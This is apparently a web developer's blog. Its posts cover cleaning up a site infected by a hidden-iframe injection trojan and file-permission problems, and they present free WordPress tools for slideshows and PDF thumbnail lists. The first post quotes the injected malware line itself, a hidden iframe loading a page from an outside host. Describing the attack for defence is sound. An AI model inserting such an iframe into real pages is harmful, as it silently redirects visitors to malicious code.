Here is a little piece of software that will effectively protect your web page against so called injection attacks, which are bound to happen to your web page sooner or later. It’s free to download and free to use. If you have a question, please ask. And trust me on this one: no1’s ones are safe ( and neither are one’s zeroes), resistance is futile and all our bases are belong to us! And of course, there’s a story to it, so keep reading …

A while ago a friend of mine asked me to check his web page as his visitors complained about it being infected with a virus or something. Since I was logged into my Google account at the time, an attempt at visiting the page was blocked by a warning page stating that the site has been attacked. I was dumb enough to proceed to the page anyway and luckily my AVG anti virus promptly detected mallware code and prevented me to even see the page. I had to download infected page via ftp and again AVG killed the file mid-air, so to see the infected file I had to rename it on the server and smuggle it behind AVG’s back. An there it was, injected just after the body tag, a hidden iframe pointing to a page in China. Like this one:

<iframe src=”http://thisorthat.cn:8080/index.php” width=154 height=115 style=”visibility: hidden”></iframe>

(more…)

Have you ever found yourself in a situation where a web application or a WordPress plug-in created a folder or a file you couldn’t touch afterwards, not even to rename or delete? It happens more often then you might think, most of the times because a developer neglected to chmod newly created item to 666 after it was created. Which causes the same to remain property of the web server account and inaccessible to the ftp account one uses to work with files on a web server.

(more…)

Two of my clients websites got framed by HTML/Framer mallware, subsequently causing their pages to be blocked by Google. This trojan adds a hidden iframe and some JavaScript code to the bottom of index.html or index.php, causing a visitor redirect to a site with more malicious code to be downloaded by unsuspecting website visitors. Since Google detects this mallware right away, Google users are promptly warned of imminent danger, which is how I was made aware off the hijacking. Cleaning up was a no-brainer except for the fact that site unblocking can only be performed through Google web master Tools central, but what worries me though is that the infection itself could only take place on a poorly protected web hosting server. Most likely thanks to a popular misconception that Linux servers are safe from mallware. Guess what: they are NOT!

Since this trojan is an extremely dumb one, adding an explicit die(); directive to any index.php just before the final ?> would render any further infections of this kind harmless, but one could safely bet on the next trojan to be more clever than this.

Many of my patients require a multilingual website which is not all that unexpected considering quite a few of them are tourist agencies, farms, hotels, apartment villages and such. Rest asured  I checked and rechecked and tested and retested many multilingual Worpress plugins before finding qTranslate. Which is just about everything a multulingual blog developer might wish for, extremely simple to use with a reach feature set on top of it for spoils. Unfortunately it didn’t work quite as expected with Wordpress 2.7 until just recently (at least as far as I was aware of), so I kept many of websites using qTranslate utilizing previous versions of Wordpress. When a new client requested a German version of his website, I decided to check whether qTranslate now supports Wp 2.7 and much to my excitement, it does now! Way to go, Qian Qin!

Check it out at qTranslate website.

Strictly speaking, this is not a plug-in. Instead of being uploaded and then activated, it only needs to be uploaded (with Wordpress media uploader, no less). But doesn’t even need a Wordpress installation to work. Will pick up all big enough images from a folder at hand and play them in a full-frame random slide-show fashion.

This one started as just another one of Wordpress gallery plug-ins. The general idea was to spice up WP gallery with a semi-customizable slide-show to play a set of images. As if there are not gazzillion similar and mostly better plug-ins already. But when one is a tweaker, one tweaks. The same story as with this very blog, which evolved from a long line of more and more minimalistic web pages. Following the ultraminimalistic approach slide-show application itself came down to a blank page with only two buttons (and even those text-only) used to navigate back and forth through a list of images.

See drop_in_slideshow.php in action.

The very essence of presenting images in a slide-show fashion is for images to cover as much screen area as possible and demand as little user interaction as possible, thus making all shadowbox and light box effects unnecessary. After gladly abandoning light-box model, I still had to pass image-related data (file names, titles, captions, descriptions, …) to this slide-show app, making thing much more complicated than necessary, but then it occurred to me: returning image file name in form of a search parameter will cause Wordpress to happily auto-navigate to a post or page with that particular image, with no additional work on my part. Slick, isn’t it. And as a side effect, this took care of another problem: somewhere along the way there was a minor mishap of a misplaced bracket which caused a perfectly good Wordpress Slide-show plug-in to go berserk all of a sudden. So to get back into saddle, all I had to do was strip the code down to a bare minimum and put it’s plug-in variety on hold for a while. Besides, the code is always much much better when written from scratch for the second time. So if you expect to be needing a proper plug-in of a kind, just stay tuned.

Instalation, drop-in (standalone) mode

• extract the two files from drop-in-slideshow.zip into a folder with images
• point to http:// your_web_page /…/ your_pic_folder/drop_in_slideshow.php

Instalation, Wordpress mode

• upload the two files from drop-in-slideshow.zip with Wordpress media uploader
• point to http://your_web_page/…/uploads/drop_in_slideshow.php

Download drop-in-slideshow.zip

Click the puzzlebutton to download drop-in-slideshow.zip

Notes

• When using with Wordpress, auto-navigation does not work for images inserted via gallery shortcode.
• Since Drop-in Slideshow fits images to browser window, you don’t have to worry about user screen resolutions and can upload images a little bit bigger than expected user screen resolution. Still, keep an eye on image sizes as there’s only one thing worse than small images: the slow ones.
• Starting with Wordpress 2.7 media uploader creates one additional image size (large), which is exactly the one to insert into your posts. This will cause Drop-in Slideshow to play each image two times, making it a double random slide-show. Presented like this it almost sounds as a feature … Turns out that the sollution is quite simple: since large images are 580 px wide to cover the width of a post (in most cases) excluding images 580 px wide from slide-show image list will eliminate the doubles.

Honestly, .pdf documents are quite a PITA because your average customer will tell you that uploading a bunch of .pdf files to a web server is all it takes to create a web version of a newspaper. Plus, .pdf documents take forever to download and/or display in one’s browser, so you are not very likely to make your site visitors very happy. Still, you can at least try to present your .pdf documents in a half-decent way, with thumbnails and all. Which of course takes a lot of work, opening a .pdf and creating a thumbnail and uploading both of them to the server and inserting the thumbnail along with a link to a .pdf … and all over again for the next one.

Thanks to Andrew Rickmann of Huddersfield, West Yorkshire and his Fun With Plugins Wordpress plugin generator I created a Wordpress plugin to do the boring part. All you have to do is upload all .pdf files that belong to a particular post or page and plugin will do the rest of the job. Like this:

Or this: Welcome magazine .pdf archive. Drop-in .pdfList relies on ImageMagick to create thumbnails every time it encounters a new .pdf file and will inform admin (and admin only) of thumbnails created. You don’t have to worry about installing ImageMagick. If your web server runs on linux, ImageMagick is probably already installed.

Usage

Put [ drop_in_pdf ] shortcode, where you want your .pdf thumbnails to be.

Up to 3 thumbnails (or less, depending on number of .pdf documents associated with particular post) will be displayed. To display more than 3 thumbnails, use

[ drop_in_pdf num=x] shortcode, where x is number of thumbnail you wish to display

You can display .pdf thumbnails of another post as well, just use

[ drop_in_pdf id=x] shortcode, where x is ID of another post with .pdf ducuments

And yes: [ drop_in_pdf id=y num=x] works, too.

Download drop-in-pdflist.zip or click this beautiful icon below

I had to do it, didn’t I? Throw in .zip download thumbnail shortcode handler as well. Icon used is from Aqua Gloss Icons set found at Deziner Folio. To place automaticaly created .zip thumbnail download icon(s), put:

[ drop_in_zip] shortcode in place. To suck .zips from another post, use id shortcode parameter.

Drop-in .pdfList is not an extremely complex plugin, so there’s no need for user settings panel and admin interface. If provided inline overlaping thumbnail style and dimensions don’t suit your needs, you can still tweak user settings in drop_in_pdflist.php file. Have fun! I mean: Have fun! Or else …